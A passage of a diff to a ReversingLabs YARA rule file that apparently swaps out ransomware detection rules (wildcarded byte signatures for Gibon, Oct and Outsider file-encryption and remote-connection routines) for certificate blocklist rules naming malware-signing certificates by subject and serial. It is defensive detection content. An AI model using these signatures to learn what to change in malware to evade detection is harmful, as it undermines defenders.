85 ?? ?? ?? ?? 89 1C 24 89 54 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B - 4C 24 ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? - 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? - ?? 8B 2D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? - 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 - ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 1C 24 8B 6C 24 ?? 89 6C 24 ?? - 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 - ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 EB ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 04 0A 89 44 24 ?? - 8B 4C 24 ?? 89 0C 24 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 6C - 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B - 54 24 ?? 89 54 24 ?? 85 C9 74 ?? 8B 1D ?? ?? ?? ?? 39 D9 0F 85 ?? ?? ?? ?? 89 0C 24 - } - $encrypt_files_p3 = { - 89 54 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 - ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? 89 4C 24 ?? E8 ?? ?? - ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 EB 0F 87 ?? ?? - ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 74 24 ?? 8B 7E ?? 89 44 24 ?? 89 4C 24 - ?? 89 54 24 ?? 8B B4 24 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? - 89 2C 24 FF D7 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? - 8B 6C 24 ?? 89 6C 24 ?? 8B 74 24 ?? 89 34 24 FF D1 8B 44 24 ?? 89 04 24 8B 4C 24 ?? - 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 - ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 4C 24 ?? 39 C1 0F 85 ?? ?? ?? ?? 89 - 0C 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 - 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 44 24 ?? B9 ?? ?? ?? ?? F7 E9 8B 44 24 ?? 01 C2 C1 F8 ?? C1 FA ?? 29 C2 89 D0 - 89 D3 F7 E9 8D 04 13 C1 F8 ?? C1 FB ?? 29 D8 83 C0 ?? 89 44 24 ?? 31 C9 EB ?? 8B 54 - 24 ?? 8D 4A ?? 8B 44 24 ?? 39 C1 7D ?? 89 4C 24 ?? 8B 44 24 ?? 89 04 24 8D 0D ?? ?? - ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 90 - E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 90 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Inter Technologies Ltd." and pe.signatures[i].serial=="67:16:a9:c1:95:98:7d:5c:fe:53:a0:94:77:94:61:e7" and 1169424000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Gibon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE { meta: - description = "Yara rule that detects Gibon ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3f1a5bee-8fc0-5596-b898-e97073731930" - date = "2020-07-15" - modified = "2020-07-15" + id = "830af0ac-fb01-5c6a-a7a3-2cf5c9d016fc" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Gibon.yara#L1-L122" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cace0f35529307487f39aace6ae8989c7b878f82ebe890b256dfac563551a099" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13348-L13366" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "90bde1313db78d4166e8c87e7e4111c576880922b1c983f3a842ea030d38a0da" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Gibon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_server_connection_1_0 = { - 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? - ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 - ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BA ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? - ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? - 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 B9 ?? ?? ?? ?? 83 FE ?? 75 ?? BA ?? ?? ?? ?? E9 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 8B - 3D ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 43 ?? - 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? FF 73 ?? 0F 43 43 ?? 8D 8D ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - } - $remote_server_connection_1_1 = { - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? - ?? ?? ?? 8B 53 ?? 8D 4B ?? 83 FA ?? 0F 43 4B ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 90 8A 01 - 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 8D 43 ?? 6A ?? 83 FA ?? 51 0F 43 43 ?? 50 56 FF 15 - ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 8B C8 E8 ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? - 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 8B 43 ?? 83 F8 ?? 72 ?? 8B 4B ?? 40 3D ?? ?? ?? ?? 72 - ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 - ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8B 4D - ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3 - } - $encryption_loop_1_0 = { - 66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? - 8B C2 83 C8 ?? 83 79 ?? ?? 0F 45 C2 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 C0 0F 85 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 C7 45 ?? ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? 83 CB ?? 68 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 8B D7 8B 9D ?? ?? ?? ?? 83 CB ?? 83 7F ?? ?? 89 9D ?? ?? ?? ?? 89 - 9D ?? ?? ?? ?? 72 ?? 8B 17 83 78 ?? ?? 8B C8 72 ?? 8B 08 8B 70 ?? 3B 77 ?? 75 ?? 85 - F6 0F 84 - } - $encryption_loop_1_1 = { - 66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? EB ?? - 32 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? - 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? - ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? - 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 32 C0 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 32 C0 C7 45 ?? ?? ?? ?? ?? 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? BA - ?? ?? ?? ?? C6 45 ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 - } - $encryption_loop_1_2 = { - 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? - ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 FF B5 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E - 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 51 FF B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 51 - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 69 0F ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? 03 48 ?? 8D 85 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 85 C0 74 ?? BA - ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 - } - $encryption_loop_1_3 = { - 69 37 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 70 ?? E8 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 78 ?? 8D - 4A ?? 89 08 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? - B9 ?? ?? ?? ?? F3 A5 66 A5 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? - ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - C6 45 ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 - ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B BD ?? - ?? ?? ?? 8B 8D ?? ?? ?? ?? FF 07 8B 07 89 41 ?? 69 17 ?? ?? ?? ?? 8B 41 ?? 80 A4 02 - ?? ?? ?? ?? ?? 8B 01 48 39 07 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F - 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 - ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8A 11 8B - C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and ($remote_server_connection_1_0 and $remote_server_connection_1_1 and ( all of ($encryption_loop_1_*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lossera-M, OOO" and (pe.signatures[i].serial=="00:87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" or pe.signatures[i].serial=="87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a") and 1493078400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Oct : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE { meta: - description = "Yara rule that detects Oct ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e811a0ba-52df-5e88-ab71-df91d5cb584a" - date = "2024-10-08" - date = "2024-10-08" - modified = "2021-08-12" + id = "c459c3ac-205c-5c13-959d-c6b40f81222f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Oct.yara#L1-L68" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3973794d6bf26eaa752cfc70a217c059a190c63a0dd92b06de7c0893d92d9e88" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13368-L13384" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4b634bc706638d72f2d036d41cf092cac538e930d7d407eebc225b482fd64f51" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73 - ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06 - 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ?? - ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? - ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33 - ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? - 13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A - } - $find_files = { - 16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ?? - 0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B - ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E - 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? - 11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ?? - 2A - } - $collect_env_and_start_enc_proc = { - 19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ?? - ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B - 72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ?? - A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 - 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? - 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? - ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? - ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A - 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16 - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A - } - condition: - uint16(0)==0x5A4D and ($collect_env_and_start_enc_proc) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LCB SISTEMAS LTDA ME" and pe.signatures[i].serial=="4b:09:3c:b6:0d:4b:99:22:66:f5:50:93:4a:4a:c7:d0" and 1478649600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Outsider : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE { meta: - description = "Yara rule that detects Outsider ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "44edccb1-9e2a-5ff9-b4b5-72ceec2f7947" - date = "2020-10-23" - modified = "2020-10-23" + id = "0db2d42d-bdc3-50bc-b360-a39ccec4df41" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Outsider.yara#L1-L88" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "80c5a93b5b72b7b66e36f1726486b0c7620588d05bd925510d76f020a40b124c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13386-L13402" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "74749317fcefcdb698046a6f42c6c6e05cc1eab1370b3b1fd7d025f49de4a032" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Outsider" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 8B D9 50 6A ?? 5E 56 FF 35 ?? ?? ?? ?? - 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 55 ?? 89 75 ?? 8B CF 2B - D7 8A 04 0A 88 01 41 83 EE ?? 75 ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 56 FF 35 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? - ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? 89 75 ?? 53 FF 15 ?? ?? ?? ?? 8D - 04 43 83 E8 ?? 66 83 38 ?? 75 ?? FF B6 ?? ?? ?? ?? 2B C3 83 C0 ?? D1 F8 8D 04 43 50 - FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? - 8B F0 FF 15 ?? ?? ?? ?? 3B C6 74 ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 83 FE ?? 72 ?? EB ?? - C7 45 ?? ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 FF 15 ?? ?? ?? - ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B D8 33 C0 50 8D 45 ?? 50 68 ?? ?? ?? - ?? 53 57 FF 